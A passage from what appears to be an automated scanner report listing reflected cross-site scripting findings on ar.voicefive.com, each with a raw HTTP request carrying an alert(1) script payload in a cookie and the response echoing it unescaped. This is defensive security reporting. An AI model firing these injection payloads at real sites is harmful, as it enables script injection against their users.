Vary: User-Agent,Accept-Encoding
Content-Length: 24792

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"57789606",Pid:"p86169922",Arc:"41386432",Location:CO
...[SNIP]...
er:null};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1303663677', "ar_p86169922": 'exp=1&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:47:57 2011&prad=57789606&arc=41386432&abe95<script>alert(1)</script>e5f21dab9a9', "UID": 'e9305be3-24.143.206.75-1303663678', "BMX_3PC": '1' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.ao
...[SNIP]...

6.414. http://ar.voicefive.com/bmx3/broker.pli [ar_p86204458 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p86204458 cookie is copied into the HTML document as plain text between tags. The payload 76915<script>alert(1)</script>db7369b158b was submitted in the ar_p86204458 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p86169922&PRAd=57789606&AR_C=41137070 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ar.voicefive.com
Cookie: ar_p86169922=exp=2&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:48:03 2011&prad=57789606&arc=41386432&; BMX_G=method->-1,ts->1303663677; BMX_3PC=1; UID=e9305be3-24.143.206.75-1303663678; ar_p86204458=exp=1&initExp=Sun Apr 24 16:48:19 2011&recExp=Sun Apr 24 16:48:19 2011&prad=60003739&arc=40736478&76915<script>alert(1)</script>db7369b158b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:48:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p86169922=exp=3&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:48:29 2011&prad=57789606&arc=41137070&; expires=Sat 23-Jul-2011 16:48:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24911

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"57789606",Pid:"p86169922",Arc:"41137070",Location:CO
...[SNIP]...
er:null};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1303663677', "ar_p86204458": 'exp=1&initExp=Sun Apr 24 16:48:19 2011&recExp=Sun Apr 24 16:48:19 2011&prad=60003739&arc=40736478&76915<script>alert(1)</script>db7369b158b', "ar_p86169922": 'exp=2&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:48:03 2011&prad=57789606&arc=41386432&', "UID": 'e9305be3-24.143.206.75-1303663678', "BMX_3PC": '1' };
COMSCORE.BMX.B
...[SNIP]...

6.415. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 762c3<script>alert(1)</script>7f44c1986e3 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p90175839&PRAd=3992125865291151&AR_C=6108747 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291151%26AR_C%3D6108747&mpt=[CACHEBUSTER]&mpvc=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=16&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 15:19:44 2011&prad=253732016&arc=207615354&; ar_p90175839=exp=1&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:22 2011&prad=3992125865291151&arc=6108747&762c3<script>alert(1)</script>7f44c1986e3; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303658422%2E014%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 15:22:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90175839=exp=2&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:22:23 2011&762c3<script>alert(1)</script>7f44c1986e3=&prad=3992125865291151&arc=6108747&; expires=Sat 23-Jul-2011 15:22:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26958

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"3992125865291151",Pid:"p90175839",Arc:"6108747",Loca
...[SNIP]...
"BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303658422%2E014%2Cwait%2D%3E10000%2C', "ar_p90175839": 'exp=1&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:22 2011&prad=3992125865291151&arc=6108747&762c3<script>alert(1)</script>7f44c1986e3', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Bro
...[SNIP]...

6.416. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 23ca7<script>alert(1)</script>3d772f731c6 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&23ca7<script>alert(1)</script>3d772f731c6; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:10:00 2011&recExp=Sun Apr 24 12:10:00 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:10:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303647000; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24741

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...
ull};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&23ca7<script>alert(1)</script>3d772f731c6' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

6.417. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload c4fd8<script>alert(1)</script>77954a0fecc was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163694&AR_C=202065971 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&c4fd8<script>alert(1)</script>77954a0fecc; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:29:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:29:11 2011&c4fd8<script>alert(1)</script>77954a0fecc=&prad=256163694&arc=202065971&; expires=Sat 23-Jul-2011 12:29:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303648151; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24862

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163694",Pid:"p97174789",Arc:"202065971",Location:
...[SNIP]...
.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&c4fd8<script>alert(1)</script>77954a0fecc', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig=
...[SNIP]...

6.418. http://ar.voicefive.com/bmx3/survey_splash.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the BMX_3PC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ff32'-alert(1)-'a8a08dc59a3 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=16ff32'-alert(1)-'a8a08dc59a3; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:12 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '16ff32'-alert(1)-'a8a08dc59a3', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

6.419. http://ar.voicefive.com/bmx3/survey_splash.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the BMX_G cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a660'-alert(1)-'37d4e73e4f8 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->13036742701a660'-alert(1)-'37d4e73e4f8; BMX_3PC=1; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:11 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
9006";COMSCORE.BMX.SurveySplash.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "BMX_G": 'method->-1,ts->13036742701a660'-alert(1)-'37d4e73e4f8', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "B
...[SNIP]...

6.420. http://ar.voicefive.com/bmx3/survey_splash.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the UID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb2a'-alert(1)-'fdfd682dc48 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046cbb2a'-alert(1)-'fdfd682dc48

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:17 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
674270', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046cbb2a'-alert(1)-'fdfd682dc48', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recEx
...[SNIP]...

6.421. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the ar_p81479006 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27c6b'-alert(1)-'7895efa01c2 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&27c6b'-alert(1)-'7895efa01c2; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:10 GMT
Content-Type: application/x-javascript
Connection: close
